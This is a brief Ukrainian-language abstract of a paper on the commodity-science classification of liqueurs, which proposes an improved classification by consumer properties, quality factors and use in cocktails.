Анотація

Узагальнено сучасні підходи до класифікацій лікерів в Україні та світі. Запропоновано удосконалену товарознавчу класифікацію лікерів з урахуванням тенденцій розвитку асортименту зазначеної продукції за ознаками, які характеризують: споживні властивості продукту, чинники формування якості лікерів та можливості використання лікерів у складі коктейлів.
